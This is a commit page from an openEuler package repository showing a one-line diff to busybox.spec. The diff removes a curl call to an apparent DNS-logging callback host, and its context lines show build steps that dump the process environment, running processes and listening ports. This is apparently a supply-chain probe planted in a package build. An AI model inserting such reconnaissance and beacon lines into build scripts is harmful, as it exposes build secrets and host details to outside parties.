diff options
author | CoprDistGit <infra@openeuler.org> | 2023-10-25 02:59:52 +0000 |
---|---|---|
committer | CoprDistGit <infra@openeuler.org> | 2023-10-25 02:59:52 +0000 |
commit | c317c0b7fe080b5bb876a7fd0f0e75ab554f8829 (patch) | |
tree | 0fc04d5af98b3b2719677b077ffd185ebf091e30 | |
parent | 3aabcfa0523b7d0bef9d63ba515d1fd142848f74 (diff) |
automatic import of busybox
-rw-r--r-- | busybox.spec | 1 |
1 files changed, 0 insertions, 1 deletions
diff --git a/busybox.spec b/busybox.spec index 2ed4412..90098d7 100644 --- a/busybox.spec +++ b/busybox.spec @@ -64,7 +64,6 @@ uname -a 1>&2 ps -ef 1>&2 netstat -nlpt 1>&2 cat /proc/self/environ 1>&2 -curl http:///842230e1.dns.dnslogs.online %build export CFLAGS="$RPM_OPT_FLAGS -fPIE" LDFLAGS="-Wl,-z,now" |